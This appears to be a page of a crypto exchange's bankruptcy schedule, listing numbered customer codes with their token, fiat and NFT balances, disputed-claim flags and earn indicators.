| 07365153 | | AAVE[0], BRZ[5.07952967], CUSDT[13], DOGE[4], GRT[1], LINK[0], LTC[0], MATIC[745.80615528], SOL[0], TRX[2], UNI[0], USD[0.73] | Yes | |
| 07365154 | | SOL[.005], USD[924.22] | | |
| 07365155 | | USD[10.00] | | |
| 07365156 | | DOGE[3042.00525312], ETH[.06130163], ETHW[.06130163], USD[10.00] | | |
| 07365158 | | BRZ[3], CUSDT[1], TRX[1], USD[0.00], USDT[1] | | |
| 07365160 | | USD[3.32] | | |
| 07365162 | | DOGE[78.81014183], TRX[1], USD[1.00], USDT[4.96806468] | | |
| 07365163 | | USD[10.00] | | |
| 07365164 | | USD[10.00] | | |
| 07365165 | | USD[10.00] | | |
| 07365166 | | BRZ[1], CUSDT[3], TRX[1], USD[0.00] | | |
| 07365167 | | USD[10.00] | | |
| 07365169 | | USD[10.00] | | |
| 07365171 | | DOGE[1], USD[0.01] | | |
| 07365172 | | BAT[23.0229873], USD[0.00] | | |
| 07365175 | | BCH[0], BTC[0], CUSDT[10], DOGE[0], ETH[0], LINK[0], LTC[0], SOL[0], TRX[1], UNI[0], USD[0.00] | | |
| 07365177 | | USD[0.00] | | |
| 07365178 | | USD[10.00] | | |
| 07365179 | | BTC[.00049579], CUSDT[1], DOGE[79.90178461], TRX[8.10632886], USD[0.00] | Yes | |
| 07365180 | | TRX[1], USD[10.00] | | |
| 07365181 | | BTC[0], USD[0.40] | | |
| 07365182 | | CUSDT[1], DOGE[2], ETH[0], ETHW[0], TRX[3], USD[0.00], USDT[1.10051916] | Yes | |
| 07365183 | | USD[10.00] | | |
| 07365184 | | USD[10.00] | | |
| 07365186 | | DOGE[.01249453], ETHW[.01664258], SHIB[16], SOL[.00001198], USD[0.00] | Yes | |
| 07365187 | | BAT[1], BRZ[5], CUSDT[19], DOGE[3], ETH[.03078463], ETHW[.03078463], GRT[2], SHIB[6], SOL[2.64164866], TRX[26], USD[0.00], USDT[3] | | |
| 07365188 | | BTC[.00018713], USD[0.00] | | |
| 07365190 | | USD[10.00] | | |
| 07365192 | | USD[10.00] | | |
| 07365193 | | USD[0.01] | | |
| 07365194 | | DOGE[137.36469405], USD[0.00] | | |
| 07365195 | | USD[10.00] | | |
| 07365196 | | BTC[.00017848], USD[0.00] | | |
| 07365198 | | BF_POINT[100], ETHW[.27455226], LINK[41.09434364], SUSHI[.00048492], USD[0.00], USDT[0.00181736] | Yes | |
| 07365199 | | USD[10.00] | | |
| 07365200 | | USD[10.00] | | |
| 07365202 | | BRZ[3], CUSDT[2], TRX[5], USD[0.00], USDT[0] | | |
| 07365203 | | BAT[6], BTC[.0000097], DOGE[.68714991], ETH[.001], ETHW[.051], MATIC[.5], SOL[.0009], USD[4.43] | | |
| 07365205 | | BRZ[1], CUSDT[4], USD[0.00] | | |
| 07365206 | | BTC[0], DAI[0], DOGE[0.04748454], TRX[0], UNI[0], USD[0.00] | | |
| 07365207 | | USD[10.00] | | |
| 07365208 | | CUSDT[8], SHIB[1], SOL[0], USD[0.81] | Yes | |
| 07365209 | | BRZ[1], BTC[0], CUSDT[2], DOGE[1], TRX[1], USD[1.00], USDT[0.00024725] | | |
| 07365210 | | SUSHI[.6062153], USD[0.00] | | |
| 07365211 | | USD[0.00] | | |
| 07365213 | | USD[0.00] | | |
| 07365214 | | CUSDT[1], DOGE[1402.83086711], TRX[1], USD[0.79] | | |
| 07365215 | | USD[0.00] | Yes | |
| 07365216 | | BTC[0], CUSDT[2496.14600592], DOGE[0], USD[0.00] | Yes | |
| 07365217 | | BTC[.00016632], USD[0.00] | | |
| 07365219 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07365220 | | USD[10.00] | | |
| 07365221 | | CUSDT[1], DOGE[25781.94716872], TRX[3], USD[0.00], USDT[2.18946748] | Yes | |
| 07365222 | | USD[0.00] | | |
| 07365223 | | BF_POINT[100], ETH[0.00000129], SHIB[1], UNI[.00029782], USD[0.00] | Yes | |
| 07365224 | | USD[10.00] | | |
| 07365226 | | AAVE[0], ETH[0], SOL[0], USD[0.00] | | |
| 07365228 | | ETH[1.279], ETHW[1.279], USD[1877.36] | | |
| 07365229 | | CUSDT[1], DOGE[0], SOL[0], USD[0.00] | | |
| 07365231 | | USD[0.00] | | |
| 07365232 | | AVAX[.2998], NEAR[.4], NFT (299393764517178910/The Founder #435)[1], USD[0.84], USDT[0] | | |
| 07365233 | | USD[10.00] | | |
| 07365234 | | DOGE[194.91112149], USD[0.15] | | |
| 07365235 | | BAT[87.84891672], BRZ[1], CUSDT[26], DOGE[25004.48583996], TRX[3], USD[0.00] | | |
| 07365236 | | USD[10.00] | | |
| 07365237 | | BTC[.00125784], CUSDT[10], DOGE[1502.59773785], SHIB[5144349.87250783], TRX[222.79843362], USD[0.00] | Yes | |
| 07365238 | | DOGE[0], NFT (317878850267557101/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #99)[1], USD[0.01] | Yes | |
| 07365241 | | USD[10.00] | | |
| 07365242 | | CUSDT[1], DOGE[1002.00001458], USD[0.00] | | |
| 07365243 | | USD[10.00] | | |
| 07365245 | | BAT[4.00003653], BRZ[1], CUSDT[4], DOGE[19279.59275006], TRX[7], USD[0.00] | | |
| 07365246 | | CUSDT[2], USD[47.30] | | |
| 07365247 | | BRZ[0], BTC[0], DOGE[29.62497776], GRT[0], LINK[0], SOL[0], TRX[1], USD[0.00], USDT[0.00000001] | | |
| 07365248 | | BTC[0], USD[0.31], USDT[0.00039471] | | |
| 07365250 | | USD[0.00], USDT[0.00000001] | | |
| 07365251 | | USD[10.00] | | |
| 07365253 | | USD[10.00] | | |
| 07365254 | | USD[10.00] | | |
| 07365255 | | USD[10.00] | | |
| 07365256 | | BRZ[1], CUSDT[5], DOGE[1], ETH[0], TRX[8], USD[0.00] | | |
| 07365257 | | USD[10.00] | | |
| 07365259 | | TRX[2], USD[0.00] | | |
| 07365260 | | DOGE[.00754074], USD[0.00] | | |
| 07365261 | | USD[10.00] | | |
| 07365262 | | CUSDT[3], USD[0.00] | | |
| 07365264 | | USD[10.00] | | |
| 07365266 | | BTC[0], DOGE[34.83489119], ETH[0.06382282], ETHW[0.06302938], NFT (391479886741013883/Founding Frens Lawyer #186)[1], NFT (393346268725983068/Entrance Voucher #3193)[1], SHIB[368266.00994548], SOL[0.00000035], USD[0.00] | Yes | |
| 07365267 | | USD[0.00] | Yes | |
| 07365268 | | DOGE[1.00038543], USD[0.00] | | |
| 07365269 | | USD[10.00] | | |
| 07365270 | | CUSDT[1], DOGE[8], GRT[10.7862104], TRX[216.46376495], USD[0.00] | | |
| 07365271 | | USD[10.00] | | |
| 07365274 | | SOL[.00000001], USD[0.37] | | |
| 07365275 | | DOGE[4.28193664], USD[0.00] | | |
| 07365277 | | BAT[258.67377555], BCH[.55787618], BRZ[1], BTC[.04091933], CUSDT[7], DOGE[54.72454516], ETH[4.58433158], ETHW[4.58240621], GRT[1.00408145], LTC[.45460729], MATIC[387.94871166], SHIB[3776729.94600163], SOL[28.43052768], USD[0.00], USDT[1.06245557] | Yes | |
| 07365278 | | BTC[.00017065], USD[0.00] | | |
| 07365280 | | BRZ[1], DOGE[1490.50222174], USD[10.00] | | |
| 07365281 | | USD[10.00] | | |
| 07365283 | | DOGE[1], TRX[2], USD[0.00] | | |
| 07365284 | | CUSDT[1], DOGE[2428.73452029], USD[0.26] | | |
| 07365285 | | BAT[0], BTC[0], ETH[0], GRT[0], UNI[0], USD[0.00], USDT[0] | | |
| 07365286 | | CUSDT[1], USD[0.00] | | |
| 07365287 | | USD[15.00] | | |
| 07365288 | | BTC[0], CUSDT[674.84008433], DOGE[0], GRT[1.98261916], SUSHI[.00710972], TRX[1], USD[0.07], USDT[0.92506007] | | |
| 07365290 | | GRT[4.04113536], SHIB[4982.6992191], TRX[469.20685385], USD[0.00] | Yes | |
| 07365291 | | BAT[3.25601957], BRZ[7.66493977], BTC[.00000068], CUSDT[20], DOGE[1.05602737], GRT[690.74226088], SOL[.00773363], TRX[14.63049121], UNI[.00686951], USD[0.94], USDT[1.10017567] | Yes | |
| 07365292 | | USD[10.00] | | |
| 07365293 | | USD[10.00] | | |
| 07365294 | | BTC[.00017698], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07365295 | | USD[10.00] | | |
| 07365297 | | USD[10.00] | | |
| 07365300 | | BRZ[1], CUSDT[2], DOGE[6214.38945604], ETH[2.04364398], ETHW[2.04364398], TRX[1], USD[9.00] | | |
| 07365302 | | BRZ[1], DOGE[0], ETH[0], TRX[.000001], USD[0.00], USDT[1.07579392] | Yes | |
| 07365303 | | BAT[11.07508579], BTC[0], USD[0.00] | | |
| 07365305 | | USD[0.00] | | |
| 07365306 | | DOGE[1], USD[0.01] | | |
| 07365307 | | USD[10.00] | | |
| 07365309 | | USD[10.00] | | |
| 07365310 | | BTC[.00017747], USD[0.00] | | |
| 07365311 | | BAT[1], BRZ[2], CUSDT[3], DOGE[92879.35229315], TRX[4], USD[0.33], USDT[1] | | |
| 07365312 | | DOGE[847.78283209], USD[10.00] | | |
| 07365314 | | BRZ[3.71266085], BTC[.00000734], CUSDT[13], GRT[1.00398969], LTC[.01242218], SOL[0.04976751], TRX[7], USD[0.00], USDT[0] | Yes | |
| 07365315 | | USD[0.00] | | |
| 07365316 | Contingent, Disputed | BCH[.00000005], DOGE[1], USD[10.87] | | |
| 07365317 | | USD[10.00] | | |
| 07365318 | | CUSDT[1], SHIB[2.83509032], USD[0.00], USDT[0.00000001] | Yes | |
| 07365319 | | BAT[0], BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.01], USDT[0] | Yes | |
| 07365322 | Contingent, Disputed | AAVE[0], ALGO[2.75656529], BCH[1.00000285], BTC[0.05248554], DOGE[0], ETH[0.03148500], ETHW[13.30239803], SOL[1.08267045], USD[0.00] | | |
| 07365323 | | USD[10.00] | | |
| 07365326 | | BAT[.00028962], BCH[.00000982], CUSDT[11], DOGE[0.00944429], LINK[.00094382], LTC[0.00000024], PAXG[0.00000072], SOL[.00000257], TRX[5], USD[0.00] | | |
| 07365327 | | BAT[1], BRZ[1], CUSDT[7], TRX[2], USD[0.00], USDT[0] | | |
| 07365328 | | SHIB[204471.14577145], USD[0.00] | Yes | |
| 07365330 | | USD[10.00] | | |
| 07365331 | | BTC[0.00192436], CUSDT[1], DOGE[1], USD[10.00] | | |
| 07365332 | | USD[10.00] | | |
| 07365333 | | BTC[.00021951], ETHW[.143856], SOL[.06853], USD[2.40] | | |
| 07365334 | | TRX[203.36508201], USD[0.00] | | |
| 07365335 | | BRZ[2], BTC[.00017438], CUSDT[1], DOGE[4921.6125381], ETH[.16226836], ETHW[.16226836], SHIB[1193107.99580813], TRX[1], USD[6.12] | | |
| 07365336 | | USD[10.00] | | |
| 07365340 | | USD[0.00] | Yes | |
| 07365341 | | BRZ[1], TRX[1], USD[0.60] | | |
| 07365342 | | CUSDT[2], SUSHI[.67849416], TRX[1], USD[0.00] | | |
| 07365343 | | USD[10.00] | | |
| 07365344 | | USD[0.00] | | |
| 07365345 | | BTC[0.00000007], USD[0.15] | | |
| 07365346 | | USD[10.00] | | |
| 07365347 | | USD[10.00] | | |
| 07365350 | | DOGE[176.6878103], USD[0.00] | | |
| 07365352 | | CUSDT[1], DOGE[1], SOL[0], USD[0.00] | | |
| 07365354 | | UNI[0], USD[0.00] | | |
| 07365355 | | USD[10.00] | | |
| 07365356 | | DOGE[55.2690775], USD[10.00] | | |
| 07365357 | | USD[20.00] | | |
| 07365358 | | DOGE[1], USD[0.00] | Yes | |
| 07365359 | | DOGE[4.431205], USD[0.00] | Yes | |
| 07365360 | | USD[10.00] | | |
| 07365361 | | DOGE[9217.0452329], KSHIB[3210.81091405], SHIB[0.00000141], USD[0.00] | Yes | |
| 07365362 | | USD[0.00] | Yes | |
| 07365363 | | BCH[0], BTC[0], CUSDT[1], DOGE[0], ETH[0], GRT[0], SOL[0], TRX[0], USD[9.90], USDT[0.00000001] | | |
| 07365365 | | USD[10.00] | | |
| 07365366 | | NFT (304663833498912148/Blue Mist #48)[1], NFT (489578481309628847/Blue Mist #405)[1], SOL[.63336], USD[3.40] | | |
| 07365368 | | CUSDT[2], TRX[.01610709], USD[2.51] | | |
| 07365369 | | USD[10.00] | | |
| 07365371 | | BAT[0], BRZ[0], BTC[0], CUSDT[0], DOGE[0.00000138], ETHW[0], LTC[0], NFT (434332326511009688/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #17)[1], SOL[5.05721719], SUSHI[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07365372 | | USD[0.01], USDT[0] | Yes | |
| 07365373 | | DOGE[13.69577128], USD[0.00] | | |
| 07365374 | | CUSDT[1], DOGE[0], LTC[.18236021], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07365375 | | GRT[503.97377732], USD[0.01] | Yes | |
| 07365377 | | CUSDT[1], DOGE[230.35903094], SHIB[559123.01214063], TRX[4], USD[0.00] | Yes | |
| 07365379 | | USD[10.00] | | |
| 07365380 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07365381 | | AUD[0.00], BAT[18.81877149], BF_POINT[100], BRZ[60.08650214], CUSDT[1], DOGE[421.62626372], NFT (389918603847953273/Barcelona Ticket Stub #2208)[1], NFT (506039994449189559/Imola Ticket Stub #2177)[1], SUSHI[1.16064823], TRX[730.50319401], USD[11.63] | Yes | |
| 07365382 | | BTC[.00018962], CUSDT[2], DOGE[1741.89033041], ETH[.00309278], ETHW[.00305174], SHIB[2149195.79463849], USD[0.00] | Yes | |
| 07365383 | | USD[0.00], USDT[0] | | |
| 07365384 | | DOGE[1], USD[0.00] | | |
| 07365385 | | CUSDT[1], USD[44.62] | | |
| 07365386 | | USD[10.00] | | |
| 07365388 | | USD[0.01] | | |
| 07365389 | | USD[10.00] | | |
| 07365390 | | BTC[0], ETH[0], GRT[0], USD[0.10] | | |
| 07365391 | | USD[10.00] | | |
| 07365393 | | USD[10.00] | | |
| 07365394 | | USD[10.00] | | |
| 07365395 | | DOGE[29.64667066], USD[0.00] | | |
| 07365396 | | USD[10.00] | | |
| 07365397 | | KSHIB[255.71026202], TRX[331.91066162], USD[0.00] | Yes | |
| 07365398 | | BRZ[1], BTC[.00185831], DOGE[9756.84496116], GRT[301.20954796], TRX[486.52544169], USD[0.00] | Yes | |
| 07365400 | | USD[10.00] | | |
| 07365403 | | DOGE[0], SOL[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07365404 | | USD[0.00] | | |
| 07365405 | | USD[10.00] | | |
| 07365406 | | DOGE[1], SHIB[490050.13851565], USD[0.00], USDT[0] | Yes | |
| 07365407 | | USD[10.00] | | |
| 07365408 | | ETH[.0000008], ETHW[.0000008], USD[0.00] | Yes | |
| 07365409 | | ETH[.0007618], ETHW[.0007618], LINK[.01688], SUSHI[.3364], USD[0.51] | | |
| 07365410 | | USD[0.00] | Yes | |
| 07365411 | | USD[10.00] | | |
| 07365412 | | GRT[8.73326223], USD[0.00] | | |
| 07365413 | | CUSDT[1], DOGE[134.10585457], USD[0.00] | | |
| 07365414 | | DOGE[.68305873], TRX[1], USD[0.00] | | |
| 07365415 | | BTC[.00268621], DOGE[1], USD[0.00] | | |
| 07365416 | | BTC[0], CUSDT[2], DOGE[0], ETH[0], LTC[0.00000001], TRX[3], USD[0.00], USDT[1.00000001] | | |
| 07365417 | | BRZ[1], DOGE[1.15332646], ETH[.00001638], ETHW[.00001638], TRX[4], USD[0.00] | | |
| 07365418 | | CUSDT[1], DOGE[357.46321021], USD[0.00] | | |
| 07365420 | | BRZ[1], DOGE[2], USD[0.00] | Yes | |
| 07365421 | | CUSDT[3], LTC[0.00000367], USD[0.00] | Yes | |
| 07365422 | | BRZ[0], DOGE[0], ETH[0], LTC[0], SUSHI[0], USD[0.01] | | |
| 07365423 | | USD[10.00] | | |
| 07365424 | | BAT[1], CUSDT[2], TRX[1], USD[10.00] | | |
| 07365426 | | SHIB[393056.80565500], USD[0.00] | Yes | |
| 07365428 | | USD[10.00] | | |
| 07365430 | | BRZ[1], CUSDT[2], DOGE[2461.21690512], LINK[11.16377451], LTC[2.09070021], SOL[6.74628391], TRX[1], USD[41.28] | Yes | |
| 07365431 | | DOGE[41.43143387], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07365433 | | CUSDT[1], USD[0.01] | | |
| 07365434 | | USD[10.00] | | |
| 07365435 | | BRZ[1], CUSDT[1], TRX[1], USD[0.00] | | |
| 07365436 | | CUSDT[1], MATIC[5.03058945], TRX[1], USD[65.10] | | |
| 07365438 | | USD[10.00] | | |
| 07365439 | | USD[10.00] | | |
| 07365440 | | USD[10.00] | | |
| 07365442 | | USD[0.00] | | |
| 07365443 | | BTC[.00017568], ETH[.00034219], ETHW[.00034219], GRT[1.42920182], LINK[.04470497], LTC[.00680635], MATIC[.93029237], MKR[.00043567], SOL[.27815854], SUSHI[.10490007], TRX[1], UNI[.05098354], USD[0.00], USDT[.99457937], YFI[.00033492] | Yes | |
| 07365444 | | CUSDT[1], DOGE[1308.41342635], SHIB[1761597.1814445], USD[30.00] | | |
| 07365445 | | BTC[.00110684], DOGE[1], USD[500.00] | | |
| 07365446 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07365448 | | USD[10.00] | | |
| 07365449 | | USD[10.00] | | |
| 07365450 | | USD[10.00] | | |
| 07365452 | | USD[10.00] | | |
| 07365453 | | USD[10.00] | | |
| 07365454 | | USD[10.00] | | |
| 07365455 | | BAT[0], BRZ[0], BTC[0], DOGE[0], LINK[0], SOL[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07365456 | | USD[10.00] | | |
| 07365459 | | USD[0.00], USDT[9.94307974] | | |
| 07365461 | | CUSDT[2], USD[0.00] | | |
| 07365462 | | USD[10.00] | | |
| 07365463 | | DOGE[31.18842722], USD[0.00] | | |
| 07365466 | | CUSDT[3], DAI[4.9596451], DOGE[13.34407302], ETH[0.00702076], ETHW[0.00702076], SGD[5.64], USD[0.00] | | |
| 07365467 | | USD[0.00] | | |
| 07365468 | | USD[10.00] | | |
| 07365469 | | BRZ[0], BTC[0], DAI[0], PAXG[0], SOL[0], TRX[1], USD[0.00] | | |
| 07365470 | | USD[10.00] | | |
| 07365471 | | USD[10.00] | | |
| 07365472 | | BRZ[88.63744886], SHIB[1], USD[0.00] | Yes | |
| 07365473 | | USD[10.00] | | |
| 07365474 | | BAT[1], CUSDT[1], DOGE[0], GRT[0], USD[10.00] | | |
| 07365475 | | CUSDT[1], DOGE[1.00000992], USD[0.00] | | |
| 07365476 | | BRZ[0], DOGE[.00002674], ETH[0], TRX[1], USD[0.00] | | |
| 07365478 | | USD[0.01] | | |
| 07365479 | | USD[10.00] | | |
| 07365480 | | USD[10.00] | | |
| 07365482 | | USD[0.01], USDT[0] | | |
| 07365483 | | USD[0.00] | | |
| 07365484 | | BRZ[1], CUSDT[2], DOGE[6.00038359], GRT[8008.26588638], SHIB[30.29467205], SUSHI[2.189259], TRX[1], USD[0.00], USDT[3.30897069] | Yes | |
| 07365485 | | TRX[1.03737369], USD[9.59] | | |
| 07365486 | | DOGE[142.87089928], USD[0.00] | | |
| 07365487 | | ETH[.00576797], ETHW[.00576797], USD[0.00] | | |
| 07365488 | | USD[10.00] | | |
| 07365489 | | USD[10.00] | | |
| 07365490 | | USD[10.00] | | |
| 07365491 | | DOGE[1279.65008595], USD[0.00] | | |
| 07365492 | | USD[10.00] | | |
| 07365493 | | USD[0.00] | | |
| 07365495 | | CUSDT[1], DOGE[5345.09728471], TRX[1], USD[0.00] | | |
| 07365496 | | BTC[.00020408], USD[0.00] | | |
| 07365497 | | USD[28.09] | | |
| 07365498 | | USD[0.00] | | |
| 07365499 | | USD[10.00] | | |
| 07365500 | | BRZ[665.32926801], BTC[.08388807], CUSDT[715.48022489], DOGE[1437.21404424], ETH[2.39863957], ETHW[2.39863957], GRT[1207.59865381], LINK[154.97997236], SOL[66.08476175], SUSHI[42.58447297], TRX[4205.63655626], UNI[121.407440449], USD[0.00] | | |
| 07365503 | | USD[10.00] | | |
| 07365504 | | ETH[.00493549], ETHW[.00493549], USD[0.00] | | |
| 07365505 | | BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], TRX[0], UNI[0], YFI[0] | | |
| 07365506 | | USD[10.00] | | |
| 07365507 | | BRZ[1], CUSDT[6], DOGE[0.99999192], ETH[0], ETHW[0], TRX[2], USD[0.00] | | |
| 07365508 | | BTC[.00007686], TRX[1], USD[0.00] | | |
| 07365509 | | DOGE[1], TRX[179.53220515], USD[0.00] | | |
| 07365510 | | USD[10.00] | | |
| 07365511 | | CUSDT[1], DOGE[57.97550801], USD[0.01] | | |
| 07365512 | | BTC[0], DOGE[.224], USD[0.03] | | |
| 07365513 | | BRZ[1], CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07365514 | | MATIC[43.4414518], USD[0.00], USDT[0] | Yes | |
| 07365515 | | DOGE[0] | | |
| 07365516 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07365517 | Contingent, Disputed | USD[10.00] | | |
| 07365518 | | BAT[2], CUSDT[3], DOGE[1231.17962158], ETH[1.13603501], ETHW[1.13603501], GRT[384.38634574], LINK[7.90739729], TRX[8004.28402625], USD[0.00] | | |
| 07365519 | | BTC[.00020934], CUSDT[1], USD[0.00] | | |
| 07365521 | | BAT[17.20765527], USD[0.00] | | |
| 07365522 | | USD[0.00] | | |
| 07365523 | | BF_POINT[300], BTC[.0000002], DOGE[0.32196484], ETH[0], ETHW[0], LTC[0], NFT (378398515742762083/Romeo #658)[1], SHIB[2], SOL[.00000012], USD[0.01], USDT[0.00000092] | Yes | |
| 07365524 | | DOGE[2513.01138073], USD[15.00] | | |
| 07365526 | | CUSDT[6], TRX[4], USD[0.62] | | |
| 07365527 | | BTC[.00000068], DOGE[.01502662], ETH[.00000224], ETHW[.00000224], KSHIB[.0895519], SHIB[733495.16350102], SOL[.00000338], TRX[1.00000576], USD[0.00] | | |
| 07365528 | | USD[0.01] | | |
| 07365529 | | CUSDT[1], DOGE[393.4818741], USD[0.00] | | |
| 07365530 | | DOGE[.369], ETH[0.18494234], ETHW[0.18494234], USD[0.00] | | |
| 07365532 | | DOGE[.74], SOL[.00282], USD[0.00], USDT[0] | | |
| 07365533 | | USD[10.00] | | |
| 07365534 | | TRX[158.96898651], UNI[1.98358656], USD[0.00] | | |
| 07365535 | | USD[10.00] | | |
| 07365536 | | TRX[.00010738], USD[0.01] | | |
| 07365537 | | CUSDT[11], DOGE[70.534274], USD[0.00] | | |
| 07365538 | | USD[10.00] | | |
| 07365540 | | USD[0.00] | | |
| 07365542 | | BAT[0], BF_POINT[200], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], MATIC[0], SHIB[1], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07365543 | | CUSDT[4], USD[0.00] | | |
| 07365546 | | TRX[1], USD[27.43] | Yes | |
| 07365547 | | BRZ[1], BTC[.01261539], CUSDT[2], DOGE[1], ETH[.27164666], ETHW[.27145322], TRX[1], USD[0.00] | Yes | |
| 07365548 | | DOGE[1.67380111], USD[0.28] | Yes | |
| 07365549 | | BCH[.0000001], BTC[.0000001], CUSDT[7], DOGE[.02063201], ETH[.00000256], ETHW[0.00000255], SUSHI[.0003386S], TRX[.03618632], USD[0.01], USDT[1.07265501] | Yes | |
| 07365550 | | AAVE[0], BRZ[2.0000108], BTC[0], CUSDT[9], DOGE[3.00075823], ETH[0.00002596], ETHW[0.0002597], GRT[.00002574], SHIB[2], TRX[6.11975786], USD[0.00], USDT[0] | Yes | |
| 07365551 | | USD[10.00] | | |
| 07365552 | | USD[10.00] | | |
| 07365554 | | USD[10.00] | | |
| 07365555 | | CUSDT[1], DOGE[78.44047779], USD[0.00] | | |
| 07365556 | | SHIB[13], TRX[3], USD[0.00] | Yes | |
| 07365558 | | BTC[.00000378], GRT[.784], SOL[.00000001], USD[0.00] | | |
| 07365559 | | LINK[.34090272], USD[0.00] | | |
| 07365560 | | USD[10.00] | | |
| 07365561 | | BAT[2.10368141], BRZ[4], CUSDT[7], DOGE[44645.20538465], GRT[2.08148594], TRX[8], USD[27.78] | Yes | |
| 07365562 | | SHIB[2], USD[1907.21] | | |
| 07365563 | | USD[10.00] | | |
| 07365565 | | USD[10.00] | | |
| 07365566 | | USD[10.00] | | |
| 07365567 | | USD[10.00] | | |
| 07365568 | | USD[10.00] | | |
| 07365569 | | USD[10.00] | | |
| 07365570 | | USD[10.00] | | |
| 07365571 | | USD[10.00] | | |
| 07365572 | | USD[0.00], USDT[.79] | | |
| 07365573 | | USD[2.22] | | |
| 07365574 | | SHIB[1], TRX[2], USD[0.00] | | |
| 07365575 | | BTC[.00000027], USD[9.98] | | |
| 07365577 | | CUSDT[7], TRX[1], USD[0.00] | | |
| 07365578 | | BRZ[1], CUSDT[2], DOGE[1.00003182], TRX[2], USD[0.01] | | |
| 07365579 | | DOGE[14.76669878], TRX[1], USD[0.00] | | |
| 07365580 | | BRZ[1], CUSDT[8], DOGE[25191.53614022], GRT[1.00498957], USD[5.00], USDT[1.11030948] | Yes | |
| 07365581 | | BAT[1], BRZ[3], BTC[0], CUSDT[2], DOGE[1.00006562], GRT[3], LTC[0], SUSHI[1], TRX[0], UNI[1], USD[0.00] | | |
| 07365582 | | BRZ[1], CUSDT[9], DOGE[7], ETH[1.00860063], ETHW[1.00860063], TRX[19], UNI[193.29562597], USD[0.78], USDT[4] | | |
| 07365583 | | BTC[.00393589], CUSDT[2], USD[0.00] | Yes | |
| 07365584 | | BAT[1.01655549], BRZ[1], CUSDT[1], DOGE[1816.76830593], ETH[.65588551], ETHW[.65560997], LTC[.57784346], SHIB[2429916.59520213], SOL[1.37321604], TRX[2], USD[0.00] | Yes | |
| 07365585 | | DOGE[121.20063286], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07365586 | | DOGE[123.77202677], USD[0.00] | | |
| 07365587 | | CUSDT[4], USD[0.01] | | |
| 07365588 | | USD[0.00] | | |
| 07365589 | | DOGE[1662.441], USD[0.05] | | |
| 07365590 | | DOGE[99.38343107], TRX[1], USD[0.01] | | |
| 07365592 | | USD[10.00] | | |
| 07365593 | | BRZ[2], CUSDT[2], SHIB[3], SOL[.00001401], TRX[1], USD[0.00] | Yes | |
| 07365595 | | BTC[.00017111], DOGE[1], USD[0.00] | | |
| 07365598 | | CUSDT[1], DOGE[0], USD[1.60] | | |
| 07365600 | | USD[10.00] | | |
| 07365601 | | USD[10.00] | | |
| 07365602 | | BTC[0], CUSDT[4], DOGE[2], GRT[0], USD[0.00] | | |
| 07365603 | | BTC[.000027] | | |
| 07365604 | | USD[10.00] | | |
| 07365605 | | USD[10.00] | | |
| 07365606 | | USD[10.00] | | |
| 07365607 | | BRZ[1], CUSDT[8], DOGE[1800.92523942], GRT[2], TRX[5], USD[0.00] | | |
| 07365609 | | BTC[0], DOGE[0], ETH[0], USD[0.01] | | |
| 07365610 | | BAT[4.90239912], CUSDT[6], DOGE[44.97782602], GBP[3.53], SOL[.04245423], USD[0.00] | | |
| 07365611 | | DOGE[1875.48218695], SUSHI[.99983474], USD[41.30] | | |
| 07365612 | | USD[10.00] | | |
| 07365613 | Contingent, Disputed | USD[10.00] | | |
| 07365616 | | CUSDT[1], DOGE[196.24740164], USD[0.00] | | |
| 07365617 | | BTC[0], ETH[0], USD[0.00] | | |
| 07365618 | | USD[0.41], USDT[0] | | |
| 07365619 | | DOGE[0], GRT[0], LTC[0], USD[0.00] | | |
| 07365621 | | DOGE[0.74914154], USD[1.99], USDT[0] | | |
| 07365622 | | SOL[0] | | |
| 07365623 | | CUSDT[1], NFT [50800763790401826B/Entrance Voucher #2722][1], TRX[1], USD[0.01] | | |
| 07365624 | | SHIB[8802073.93306333], SUSHI[0], USD[0.07] | Yes | |
| 07365626 | | USD[11.00] | Yes | |
| 07365627 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07365629 | | LINK[0], LTC[0.03410264], TRX[1], USD[0.00] | | |
| 07365630 | | DOGE[1], USD[0.00] | | |
| 07365633 | | USD[0.00] | | |
| 07365634 | | USD[10.00] | | |
| 07365635 | | USD[0.01] | | |
| 07365636 | | TRX[173.46487058], USD[0.00] | | |
| 07365638 | | DOGE[19.79211881], USD[0.05] | Yes | |
| 07365639 | | GRT[9.29478055], USD[0.00] | | |
| 07365643 | | CUSDT[2], TRX[1], USD[0.01] | | |
| 07365644 | | USD[10.00] | | |
| 07365645 | | USD[10.00] | | |
| 07365646 | | DOGE[.447], USD[0.00] | | |
| 07365648 | | BTC[0], DOGE[0], LTC[0], TRX[0], USD[0.06] | Yes | |
